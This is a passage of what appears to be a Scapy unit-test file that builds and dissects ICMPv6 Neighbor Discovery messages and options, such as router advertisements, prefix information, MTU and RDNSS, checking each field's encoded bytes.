\x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\xff\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x86\x00E\xe7\x00\x08\x07\x08\x00\x00\x00\x00\x00\x00\x00\x00') -b = IPv6(b"`\x00\x00\x00\x00\x10:\xff\xff\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01 \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x85\x00M\xff\x00\x00\x00\x00") -assert a.answers(b) - -= ICMPv6ND_RA - Summary Output -ICMPv6ND_RA(chlim=42, M=0, O=1, H=0, prf=1, P=0, routerlifetime=300).mysummary() == "ICMPv6 Neighbor Discovery - Router Advertisement Lifetime 300 Hop Limit 42 Preference High Managed 0 Other 1 Home 0" - -############ -############ -+ ICMPv6ND_NS Class Test - -= ICMPv6ND_NS - Basic Instantiation -raw(ICMPv6ND_NS()) == b'\x87\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' - -= ICMPv6ND_NS - Instantiation with specific values -raw(ICMPv6ND_NS(code=0x11, res=3758096385, tgt="ffff::1111")) == b'\x87\x11\x00\x00\xe0\x00\x00\x01\xff\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x11\x11' - -= ICMPv6ND_NS - Basic Dissection -a=ICMPv6ND_NS(b'\x87\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00') -a.code==0 and a.res==0 and a.tgt=="::" - -= ICMPv6ND_NS - Dissection with specific values -a=ICMPv6ND_NS(b'\x87\x11\x00\x00\xe0\x00\x00\x01\xff\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x11\x11') -assert a.code==0x11 and a.res==3758096385 and a.tgt=="ffff::1111" -assert a.hashret() == b"ffff::1111" - -= ICMPv6ND_NS - IPv6 layer fields overloading -a=IPv6(raw(IPv6()/ICMPv6ND_NS())) -a.nh == 58 and a.dst=="ff02::1" and a.hlim==255 - -############ -############ -+ ICMPv6ND_NA Class Test - -= ICMPv6ND_NA - Basic Instantiation -raw(ICMPv6ND_NA()) == b'\x88\x00\x00\x00\xa0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' - -= ICMPv6ND_NA - Instantiation with specific values -raw(ICMPv6ND_NA(code=0x11, R=0, S=1, O=0, res=1, tgt="ffff::1111")) == b'\x88\x11\x00\x00@\x00\x00\x01\xff\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x11\x11' - -= ICMPv6ND_NA - Basic Dissection -a=ICMPv6ND_NA(b'\x88\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00') -a.code==0 and a.R==0 and a.S==0 and a.O==0 and a.res==0 and a.tgt=="::" - -= ICMPv6ND_NA - Dissection with specific values -a=ICMPv6ND_NA(b'\x88\x11\x00\x00@\x00\x00\x01\xff\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x11\x11') -a.code==0x11 and a.R==0 and a.S==1 and a.O==0 and a.res==1 and a.tgt=="ffff::1111" -assert a.hashret() == b'ffff::1111' - -= ICMPv6ND_NS - IPv6 layer fields overloading -a=IPv6(raw(IPv6()/ICMPv6ND_NS())) -a.nh == 58 and a.dst=="ff02::1" and a.hlim==255 - - -############ -############ -+ ICMPv6ND_ND/ICMPv6ND_ND matching test - -= ICMPv6ND_ND/ICMPv6ND_ND matching - test 1 -# Sent NS -a=IPv6(b'`\x00\x00\x00\x00\x18:\xff\xfe\x80\x00\x00\x00\x00\x00\x00\x02\x0f\x1f\xff\xfe\xcaFP\xff\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x87\x00UC\x00\x00\x00\x00\xfe\x80\x00\x00\x00\x00\x00\x00\x02\x0f4\xff\xfe\x8a\x8a\xa1') -# Received NA -b=IPv6(b'n\x00\x00\x00\x00 :\xff\xfe\x80\x00\x00\x00\x00\x00\x00\x02\x0f4\xff\xfe\x8a\x8a\xa1\xfe\x80\x00\x00\x00\x00\x00\x00\x02\x0f\x1f\xff\xfe\xcaFP\x88\x00\xf3F\xe0\x00\x00\x00\xfe\x80\x00\x00\x00\x00\x00\x00\x02\x0f4\xff\xfe\x8a\x8a\xa1\x02\x01\x00\x0f4\x8a\x8a\xa1') -b.answers(a) - - -############ -############ -+ ICMPv6NDOptUnknown Class Test - -= ICMPv6NDOptUnknown - Basic Instantiation -raw(ICMPv6NDOptUnknown()) == b'\x00\x02' - -= ICMPv6NDOptUnknown - Instantiation with specific values -raw(ICMPv6NDOptUnknown(len=4, data="somestring")) == b'\x00\x04somestring' - -= ICMPv6NDOptUnknown - Basic Dissection -a=ICMPv6NDOptUnknown(b'\x00\x02') -a.type == 0 and a.len == 2 - -= ICMPv6NDOptUnknown - Dissection with specific values -a=ICMPv6NDOptUnknown(b'\x00\x04somerawing') -a.type == 0 and a.len==4 and a.data == b"so" and isinstance(a.payload, Raw) and a.payload.load == b"merawing" - - -############ -############ -+ ICMPv6NDOptSrcLLAddr Class Test - -= ICMPv6NDOptSrcLLAddr - Basic Instantiation -raw(ICMPv6NDOptSrcLLAddr()) == b'\x01\x01\x00\x00\x00\x00\x00\x00' - -= ICMPv6NDOptSrcLLAddr - Instantiation with specific values -raw(ICMPv6NDOptSrcLLAddr(len=2, lladdr="11:11:11:11:11:11")) == b'\x01\x02\x11\x11\x11\x11\x11\x11' - -= ICMPv6NDOptSrcLLAddr - Basic Dissection -a=ICMPv6NDOptSrcLLAddr(b'\x01\x01\x00\x00\x00\x00\x00\x00') -a.type == 1 and a.len == 1 and a.lladdr == "00:00:00:00:00:00" - -= ICMPv6NDOptSrcLLAddr - Instantiation with specific values -a=ICMPv6NDOptSrcLLAddr(b'\x01\x02\x11\x11\x11\x11\x11\x11') -a.type == 1 and a.len == 2 and a.lladdr == "11:11:11:11:11:11" - - -############ -############ -+ ICMPv6NDOptDstLLAddr Class Test - -= ICMPv6NDOptDstLLAddr - Basic Instantiation -raw(ICMPv6NDOptDstLLAddr()) == b'\x02\x01\x00\x00\x00\x00\x00\x00' - -= ICMPv6NDOptDstLLAddr - Instantiation with specific values -raw(ICMPv6NDOptDstLLAddr(len=2, lladdr="11:11:11:11:11:11")) == b'\x02\x02\x11\x11\x11\x11\x11\x11' - -= ICMPv6NDOptDstLLAddr - Basic Dissection -a=ICMPv6NDOptDstLLAddr(b'\x02\x01\x00\x00\x00\x00\x00\x00') -a.type == 2 and a.len == 1 and a.lladdr == "00:00:00:00:00:00" - -= ICMPv6NDOptDstLLAddr - Instantiation with specific values -a=ICMPv6NDOptDstLLAddr(b'\x02\x02\x11\x11\x11\x11\x11\x11') -a.type == 2 and a.len == 2 and a.lladdr == "11:11:11:11:11:11" - - -############ -############ -+ ICMPv6NDOptPrefixInfo Class Test - -= ICMPv6NDOptPrefixInfo - Basic Instantiation -raw(ICMPv6NDOptPrefixInfo()) == b'\x03\x04@\xc0\xff\xff\xff\xff\xff\xff\xff\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' - -= ICMPv6NDOptPrefixInfo - Instantiation with specific values -raw(ICMPv6NDOptPrefixInfo(len=5, prefixlen=64, L=0, A=0, R=1, res1=1, validlifetime=0x11111111, preferredlifetime=0x22222222, res2=0x33333333, prefix="2001:db8::1")) == b'\x03\x05@!\x11\x11\x11\x11""""3333 \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01' - -= ICMPv6NDOptPrefixInfo - Basic Dissection -a=ICMPv6NDOptPrefixInfo(b'\x03\x04\x00\xc0\xff\xff\xff\xff\xff\xff\xff\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00') -a.type == 3 and a.len == 4 and a.prefixlen == 0 and a.L == 1 and a.A == 1 and a.R == 0 and a.res1 == 0 and a.validlifetime == 0xffffffff and a.preferredlifetime == 0xffffffff and a.res2 == 0 and a.prefix == "::" - -= ICMPv6NDOptPrefixInfo - Instantiation with specific values -a=ICMPv6NDOptPrefixInfo(b'\x03\x05@!\x11\x11\x11\x11""""3333 \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01') -a.type == 3 and a.len == 5 and a.prefixlen == 64 and a.L == 0 and a.A == 0 and a.R == 1 and a.res1 == 1 and a.validlifetime == 0x11111111 and a.preferredlifetime == 0x22222222 and a.res2 == 0x33333333 and a.prefix == "2001:db8::1" - - -############ -############ -+ ICMPv6NDOptRedirectedHdr Class Test - -= ICMPv6NDOptRedirectedHdr - Basic Instantiation -~ ICMPv6NDOptRedirectedHdr -raw(ICMPv6NDOptRedirectedHdr()) == b'\x04\x01\x00\x00\x00\x00\x00\x00' - -= ICMPv6NDOptRedirectedHdr - Instantiation with specific values -~ ICMPv6NDOptRedirectedHdr -raw(ICMPv6NDOptRedirectedHdr(len=0xff, res="abcdef", pkt="somestringthatisnotanipv6packet")) == b'\x04\xffabcdefsomestringthatisnotanipv' - -= ICMPv6NDOptRedirectedHdr - Instantiation with simple IPv6 packet (no upper layer) -~ ICMPv6NDOptRedirectedHdr -raw(ICMPv6NDOptRedirectedHdr(pkt=IPv6())) == b'\x04\x06\x00\x00\x00\x00\x00\x00`\x00\x00\x00\x00\x00;@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01' - -= ICMPv6NDOptRedirectedHdr - Basic Dissection -~ ICMPv6NDOptRedirectedHdr -a=ICMPv6NDOptRedirectedHdr(b'\x04\x00\x00\x00') -assert(a.type == 4) -assert(a.len == 0) -assert(a.res == b"\x00\x00") -assert(a.pkt == b"") - -= ICMPv6NDOptRedirectedHdr - Disssection with specific values -~ ICMPv6NDOptRedirectedHdr -a=ICMPv6NDOptRedirectedHdr(b'\x04\xff\x11\x11\x00\x00\x00\x00somerawingthatisnotanipv6pac') -a.type == 4 and a.len == 255 and a.res == b'\x11\x11\x00\x00\x00\x00' and isinstance(a.pkt, Raw) and a.pkt.load == b"somerawingthatisnotanipv6pac" - -= ICMPv6NDOptRedirectedHdr - Dissection with cut IPv6 Header -~ ICMPv6NDOptRedirectedHdr -a=ICMPv6NDOptRedirectedHdr(b'\x04\x06\x00\x00\x00\x00\x00\x00`\x00\x00\x00\x00\x00;@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00') -a.type == 4 and a.len == 6 and a.res == b"\x00\x00\x00\x00\x00\x00" and isinstance(a.pkt, Raw) and a.pkt.load == b'`\x00\x00\x00\x00\x00;@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' - -= ICMPv6NDOptRedirectedHdr - Complete dissection -~ ICMPv6NDOptRedirectedHdr -x=ICMPv6NDOptRedirectedHdr(b'\x04\x06\x00\x00\x00\x00\x00\x00`\x00\x00\x00\x00\x00;@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01') -y=x.copy() -del(y.len) -x == ICMPv6NDOptRedirectedHdr(raw(y)) - -# Add more tests - - -############ -############ -+ ICMPv6NDOptMTU Class Test - -= ICMPv6NDOptMTU - Basic Instantiation -raw(ICMPv6NDOptMTU()) == b'\x05\x01\x00\x00\x00\x00\x05\x00' - -= ICMPv6NDOptMTU - Instantiation with specific values -raw(ICMPv6NDOptMTU(len=2, res=0x1111, mtu=1500)) == b'\x05\x02\x11\x11\x00\x00\x05\xdc' - -= ICMPv6NDOptMTU - Basic dissection -a=ICMPv6NDOptMTU(b'\x05\x01\x00\x00\x00\x00\x05\x00') -a.type == 5 and a.len == 1 and a.res == 0 and a.mtu == 1280 - -= ICMPv6NDOptMTU - Dissection with specific values -a=ICMPv6NDOptMTU(b'\x05\x02\x11\x11\x00\x00\x05\xdc') -a.type == 5 and a.len == 2 and a.res == 0x1111 and a.mtu == 1500 - -= ICMPv6NDOptMTU - Summary Output -ICMPv6NDOptMTU(b'\x05\x02\x11\x11\x00\x00\x05\xdc').mysummary() == "ICMPv6 Neighbor Discovery Option - MTU 1500" - - -############ -############ -+ ICMPv6NDOptShortcutLimit Class Test (RFC2491) - -= ICMPv6NDOptShortcutLimit - Basic Instantiation -raw(ICMPv6NDOptShortcutLimit()) == b'\x06\x01(\x00\x00\x00\x00\x00' - -= ICMPv6NDOptShortcutLimit - Instantiation with specific values -raw(ICMPv6NDOptShortcutLimit(len=2, shortcutlim=0x11, res1=0xee, res2=0xaaaaaaaa)) == b'\x06\x02\x11\xee\xaa\xaa\xaa\xaa' - -= ICMPv6NDOptShortcutLimit - Basic Dissection -a=ICMPv6NDOptShortcutLimit(b'\x06\x01(\x00\x00\x00\x00\x00') -a.type == 6 and a.len == 1 and a.shortcutlim == 40 and a.res1 == 0 and a.res2 == 0 - -= ICMPv6NDOptShortcutLimit - Dissection with specific values -a=ICMPv6NDOptShortcutLimit(b'\x06\x02\x11\xee\xaa\xaa\xaa\xaa') -a.len==2 and a.shortcutlim==0x11 and a.res1==0xee and a.res2==0xaaaaaaaa - - -############ -############ -+ ICMPv6NDOptAdvInterval Class Test - -= ICMPv6NDOptAdvInterval - Basic Instantiation -raw(ICMPv6NDOptAdvInterval()) == b'\x07\x01\x00\x00\x00\x00\x00\x00' - -= ICMPv6NDOptAdvInterval - Instantiation with specific values -raw(ICMPv6NDOptAdvInterval(len=2, res=0x1111, advint=0xffffffff)) == b'\x07\x02\x11\x11\xff\xff\xff\xff' - -= ICMPv6NDOptAdvInterval - Basic dissection -a=ICMPv6NDOptAdvInterval(b'\x07\x01\x00\x00\x00\x00\x00\x00') -a.type == 7 and a.len == 1 and a.res == 0 and a.advint == 0 - -= ICMPv6NDOptAdvInterval - Dissection with specific values -a=ICMPv6NDOptAdvInterval(b'\x07\x02\x11\x11\xff\xff\xff\xff') -a.type == 7 and a.len == 2 and a.res == 0x1111 and a.advint == 0xffffffff - - -############ -############ -+ ICMPv6NDOptHAInfo Class Test - -= ICMPv6NDOptHAInfo - Basic Instantiation -raw(ICMPv6NDOptHAInfo()) == b'\x08\x01\x00\x00\x00\x00\x00\x01' - -= ICMPv6NDOptHAInfo - Instantiation with specific values -raw(ICMPv6NDOptHAInfo(len=2, res=0x1111, pref=0x2222, lifetime=0x3333)) == b'\x08\x02\x11\x11""33' - -= ICMPv6NDOptHAInfo - Basic dissection -a=ICMPv6NDOptHAInfo(b'\x08\x01\x00\x00\x00\x00\x00\x01') -a.type == 8 and a.len == 1 and a.res == 0 and a.pref == 0 and a.lifetime == 1 - -= ICMPv6NDOptHAInfo - Dissection with specific values -a=ICMPv6NDOptHAInfo(b'\x08\x02\x11\x11""33') -a.type == 8 and a.len == 2 and a.res == 0x1111 and a.pref == 0x2222 and a.lifetime == 0x3333 - - -############ -############ -+ ICMPv6NDOptSrcAddrList Class Test - -= ICMPv6NDOptSrcAddrList - Basic Instantiation -raw(ICMPv6NDOptSrcAddrList()) == b'\t\x01\x00\x00\x00\x00\x00\x00' - -= ICMPv6NDOptSrcAddrList - Instantiation with specific values (auto len) -raw(ICMPv6NDOptSrcAddrList(res="BBBBBB", addrlist=["ffff::ffff", "1111::1111"])) == b'\t\x05BBBBBB\xff\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\x11\x11\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x11\x11' - -= ICMPv6NDOptSrcAddrList - Instantiation with specific values -raw(ICMPv6NDOptSrcAddrList(len=3, res="BBBBBB", addrlist=["ffff::ffff", "1111::1111"])) == b'\t\x03BBBBBB\xff\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\x11\x11\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x11\x11' - -= ICMPv6NDOptSrcAddrList - Basic Dissection -a=ICMPv6NDOptSrcAddrList(b'\t\x01\x00\x00\x00\x00\x00\x00') -a.type == 9 and a.len == 1 and a.res == b'\x00\x00\x00\x00\x00\x00' and not a.addrlist - -= ICMPv6NDOptSrcAddrList - Dissection with specific values (auto len) -a=ICMPv6NDOptSrcAddrList(b'\t\x05BBBBBB\xff\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\x11\x11\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x11\x11') -a.type == 9 and a.len == 5 and a.res == b'BBBBBB' and len(a.addrlist) == 2 and a.addrlist[0] == "ffff::ffff" and a.addrlist[1] == "1111::1111" - -= ICMPv6NDOptSrcAddrList - Dissection with specific values -conf.debug_dissector = False -a=ICMPv6NDOptSrcAddrList(b'\t\x03BBBBBB\xff\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\x11\x11\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x11\x11') -conf.debug_dissector = True -a.type == 9 and a.len == 3 and a.res == b'BBBBBB' and len(a.addrlist) == 1 and a.addrlist[0] == "ffff::ffff" and isinstance(a.payload, Raw) and a.payload.load == b'\x11\x11\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x11\x11' - - -############ -############ -+ ICMPv6NDOptTgtAddrList Class Test - -= ICMPv6NDOptTgtAddrList - Basic Instantiation -raw(ICMPv6NDOptTgtAddrList()) == b'\n\x01\x00\x00\x00\x00\x00\x00' - -= ICMPv6NDOptTgtAddrList - Instantiation with specific values (auto len) -raw(ICMPv6NDOptTgtAddrList(res="BBBBBB", addrlist=["ffff::ffff", "1111::1111"])) == b'\n\x05BBBBBB\xff\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\x11\x11\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x11\x11' - -= ICMPv6NDOptTgtAddrList - Instantiation with specific values -raw(ICMPv6NDOptTgtAddrList(len=3, res="BBBBBB", addrlist=["ffff::ffff", "1111::1111"])) == b'\n\x03BBBBBB\xff\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\x11\x11\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x11\x11' - -= ICMPv6NDOptTgtAddrList - Basic Dissection -a=ICMPv6NDOptTgtAddrList(b'\n\x01\x00\x00\x00\x00\x00\x00') -a.type == 10 and a.len == 1 and a.res == b'\x00\x00\x00\x00\x00\x00' and not a.addrlist - -= ICMPv6NDOptTgtAddrList - Dissection with specific values (auto len) -a=ICMPv6NDOptTgtAddrList(b'\n\x05BBBBBB\xff\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\x11\x11\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x11\x11') -a.type == 10 and a.len == 5 and a.res == b'BBBBBB' and len(a.addrlist) == 2 and a.addrlist[0] == "ffff::ffff" and a.addrlist[1] == "1111::1111" - -= ICMPv6NDOptTgtAddrList - Instantiation with specific values -conf.debug_dissector = False -a=ICMPv6NDOptTgtAddrList(b'\n\x03BBBBBB\xff\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\x11\x11\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x11\x11') -conf.debug_dissector = True -a.type == 10 and a.len == 3 and a.res == b'BBBBBB' and len(a.addrlist) == 1 and a.addrlist[0] == "ffff::ffff" and isinstance(a.payload, Raw) and a.payload.load == b'\x11\x11\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x11\x11' - - -############ -############ -+ ICMPv6NDOptIPAddr Class Test (RFC 4068) - -= ICMPv6NDOptIPAddr - Basic Instantiation -raw(ICMPv6NDOptIPAddr()) == b'\x11\x03\x01@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' - -= ICMPv6NDOptIPAddr - Instantiation with specific values -raw(ICMPv6NDOptIPAddr(len=5, optcode=0xff, plen=40, res=0xeeeeeeee, addr="ffff::1111")) == b'\x11\x05\xff(\xee\xee\xee\xee\xff\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x11\x11' - -= ICMPv6NDOptIPAddr - Basic Dissection -a=ICMPv6NDOptIPAddr(b'\x11\x03\x01@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00') -a.type == 17 and a.len == 3 and a.optcode == 1 and a.plen == 64 and a.res == 0 and a.addr == "::" - -= ICMPv6NDOptIPAddr - Dissection with specific values -a=ICMPv6NDOptIPAddr(b'\x11\x05\xff(\xee\xee\xee\xee\xff\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x11\x11') -a.type == 17 and a.len == 5 and a.optcode == 0xff and a.plen == 40 and a.res == 0xeeeeeeee and a.addr == "ffff::1111" - - -############ -############ -+ ICMPv6NDOptNewRtrPrefix Class Test (RFC 4068) - -= ICMPv6NDOptNewRtrPrefix - Basic Instantiation -raw(ICMPv6NDOptNewRtrPrefix()) == b'\x12\x03\x00@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' - -= ICMPv6NDOptNewRtrPrefix - Instantiation with specific values -raw(ICMPv6NDOptNewRtrPrefix(len=5, optcode=0xff, plen=40, res=0xeeeeeeee, prefix="ffff::1111")) == b'\x12\x05\xff(\xee\xee\xee\xee\xff\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x11\x11' - -= ICMPv6NDOptNewRtrPrefix - Basic Dissection -a=ICMPv6NDOptNewRtrPrefix(b'\x12\x03\x00@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00') -a.type == 18 and a.len == 3 and a.optcode == 0 and a.plen == 64 and a.res == 0 and a.prefix == "::" - -= ICMPv6NDOptNewRtrPrefix - Dissection with specific values -a=ICMPv6NDOptNewRtrPrefix(b'\x12\x05\xff(\xee\xee\xee\xee\xff\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x11\x11') -a.type == 18 and a.len == 5 and a.optcode == 0xff and a.plen == 40 and a.res == 0xeeeeeeee and a.prefix == "ffff::1111" - - -############ -############ -+ ICMPv6NDOptLLA Class Test (RFC 4068) - -= ICMPv6NDOptLLA - Basic Instantiation -raw(ICMPv6NDOptLLA()) == b'\x13\x01\x00\x00\x00\x00\x00\x00\x00' - -= ICMPv6NDOptLLA - Instantiation with specific values -raw(ICMPv6NDOptLLA(len=2, optcode=3, lla="ff:11:ff:11:ff:11")) == b'\x13\x02\x03\xff\x11\xff\x11\xff\x11' - -= ICMPv6NDOptLLA - Basic Dissection -a=ICMPv6NDOptLLA(b'\x13\x01\x00\x00\x00\x00\x00\x00\x00') -a.type == 19 and a.len == 1 and a.optcode == 0 and a.lla == "00:00:00:00:00:00" - -= ICMPv6NDOptLLA - Dissection with specific values -a=ICMPv6NDOptLLA(b'\x13\x02\x03\xff\x11\xff\x11\xff\x11') -a.type == 19 and a.len == 2 and a.optcode == 3 and a.lla == "ff:11:ff:11:ff:11" - - -############ -############ -+ ICMPv6NDOptRouteInfo Class Test - -= ICMPv6NDOptRouteInfo - Basic Instantiation -raw(ICMPv6NDOptRouteInfo()) == b'\x18\x01\x00\x00\xff\xff\xff\xff' - -= ICMPv6NDOptRouteInfo - Instantiation with forced prefix but no length -raw(ICMPv6NDOptRouteInfo(prefix="2001:db8:1:1:1:1:1:1")) == b'\x18\x03\x00\x00\xff\xff\xff\xff \x01\r\xb8\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01' - -= ICMPv6NDOptRouteInfo - Instantiation with forced length values (1/4) -raw(ICMPv6NDOptRouteInfo(len=1, prefix="2001:db8:1:1:1:1:1:1")) == b'\x18\x01\x00\x00\xff\xff\xff\xff' - -= ICMPv6NDOptRouteInfo - Instantiation with forced length values (2/4) -raw(ICMPv6NDOptRouteInfo(len=2, prefix="2001:db8:1:1:1:1:1:1")) == b'\x18\x02\x00\x00\xff\xff\xff\xff \x01\r\xb8\x00\x01\x00\x01' - -= ICMPv6NDOptRouteInfo - Instantiation with forced length values (3/4) -raw(ICMPv6NDOptRouteInfo(len=3, prefix="2001:db8:1:1:1:1:1:1")) == b'\x18\x03\x00\x00\xff\xff\xff\xff \x01\r\xb8\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01' - -= ICMPv6NDOptRouteInfo - Instantiation with forced length values (4/4) -raw(ICMPv6NDOptRouteInfo(len=4, prefix="2001:db8:1:1:1:1:1:1")) == b'\x18\x04\x00\x00\xff\xff\xff\xff \x01\r\xb8\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00' - -= ICMPv6NDOptRouteInfo - Instantiation with specific values -raw(ICMPv6NDOptRouteInfo(len=6, plen=0x11, res1=1, prf=3, res2=1, rtlifetime=0x22222222, prefix="2001:db8::1")) == b'\x18\x06\x119"""" \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' - -= ICMPv6NDOptRouteInfo - Basic dissection -a=ICMPv6NDOptRouteInfo(b'\x18\x03\x00\x00\xff\xff\xff\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00') -a.type == 24 and a.len == 3 and a.plen == 0 and a.res1 == 0 and a.prf == 0 and a.res2 == 0 and a.rtlifetime == 0xffffffff and a. prefix == "::" - -= ICMPv6NDOptRouteInfo - Dissection with specific values -a=ICMPv6NDOptRouteInfo(b'\x18\x04\x119"""" \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01') -a.plen == 0x11 and a.res1 == 1 and a.prf == 3 and a.res2 == 1 and a.rtlifetime == 0x22222222 and a.prefix == "2001:db8::1" - -= ICMPv6NDOptRouteInfo - Summary Output -ICMPv6NDOptRouteInfo(b'\x18\x04\x119"""" \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01').mysummary() == "ICMPv6 Neighbor Discovery Option - Route Information Option 2001:db8::1/17 Preference Low" - - -############ -############ -+ ICMPv6NDOptMAP Class Test - -= ICMPv6NDOptMAP - Basic Instantiation -raw(ICMPv6NDOptMAP()) == b'\x17\x03\x1f\x80\xff\xff\xff\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' - -= ICMPv6NDOptMAP - Instantiation with specific values -raw(ICMPv6NDOptMAP(len=5, dist=3, pref=10, R=0, res=1, validlifetime=0x11111111, addr="ffff::1111")) == b'\x17\x05:\x01\x11\x11\x11\x11\xff\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x11\x11' - -= ICMPv6NDOptMAP - Basic Dissection -a=ICMPv6NDOptMAP(b'\x17\x03\x1f\x80\xff\xff\xff\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00') -a.type==23 and a.len==3 and a.dist==1 and a.pref==15 and a.R==1 and a.res==0 and a.validlifetime==0xffffffff and a.addr=="::" - -= ICMPv6NDOptMAP - Dissection with specific values -a=ICMPv6NDOptMAP(b'\x17\x05:\x01\x11\x11\x11\x11\xff\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x11\x11') -a.type==23 and a.len==5 and a.dist==3 and a.pref==10 and a.R==0 and a.res==1 and a.validlifetime==0x11111111 and a.addr=="ffff::1111" - - -############ -############ -+ ICMPv6NDOptRDNSS Class Test - -= ICMPv6NDOptRDNSS - Basic Instantiation -raw(ICMPv6NDOptRDNSS()) == b'\x19\x01\x00\x00\xff\xff\xff\xff' - -= ICMPv6NDOptRDNSS - Basic instantiation with 1 DNS address -raw(ICMPv6NDOptRDNSS(dns=["2001:db8::1"])) == b'\x19\x03\x00\x00\xff\xff\xff\xff \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01' - -= ICMPv6NDOptRDNSS - Basic instantiation with 2 DNS addresses -raw(ICMPv6NDOptRDNSS(dns=["2001:db8::1", "2001:db8::2"])) == b'\x19\x05\x00\x00\xff\xff\xff\xff \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01 \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02' - -= ICMPv6NDOptRDNSS - Instantiation with specific values -raw(ICMPv6NDOptRDNSS(len=43, res=0xaaee, lifetime=0x11111111, dns=["2001:db8::2"])) == b'\x19+\xaa\xee\x11\x11\x11\x11 \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02' - -= ICMPv6NDOptRDNSS - Basic Dissection 